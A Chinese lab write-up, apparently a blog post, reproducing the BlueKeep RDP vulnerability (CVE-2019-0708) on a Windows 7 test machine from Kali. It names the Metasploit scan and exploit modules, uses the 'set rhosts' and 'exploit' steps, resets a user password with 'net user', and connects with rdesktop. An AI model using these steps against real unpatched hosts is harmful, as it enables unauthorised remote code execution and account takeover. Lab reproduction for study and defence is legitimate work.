CVE-2019-0708漏洞复现

本文详细介绍了如何在Kali Linux环境下针对Windows 7系统复现CEV-2019-0708 RDP漏洞,即BlueKeep漏洞。实验过程包括开启3389端口,使用Metasploit Framework进行漏洞扫描和攻击,最终成功实现远程桌面的连接并验证漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、实验目的

实现CEV-2019-0708 RDP漏洞复现, 漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。

二、 实验内容

1. 实验环境

kali(192.168.91.129)
Win7 (192.168.91.191)
在这里插入图片描述
开启3389端口,允许远程桌面连接;修改高级共享设置,默认是关闭的;
在这里插入图片描述

2. 进入msfconsole

在这里插入图片描述

3. 漏洞测试

输入search cve-2019-0708
在这里插入图片描述
可用测试模块:
0 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
攻击模块:
1 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free

使用扫描测试模块
命令use 0
在这里插入图片描述
指定靶机的ip地址
Set rhosts
进行攻击exploit
在这里插入图片描述
可以看到靶机存在漏洞提示

4.攻击

使用攻击模块
在这里插入图片描述
设置目标IP地址
在这里插入图片描述
攻击
在这里插入图片描述
攻击成功,输入ipconfig可以看到目标主机的ip地址。
在这里插入图片描述
在这里插入图片描述
更改用户密码,进行远程登陆
Net user root 123

远程连接测试
rdesktop 192.168.91.191

在这里插入图片描述
连接成功,输入密码
在这里插入图片描述
连接成功

在这里插入图片描述
漏洞复现成功。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值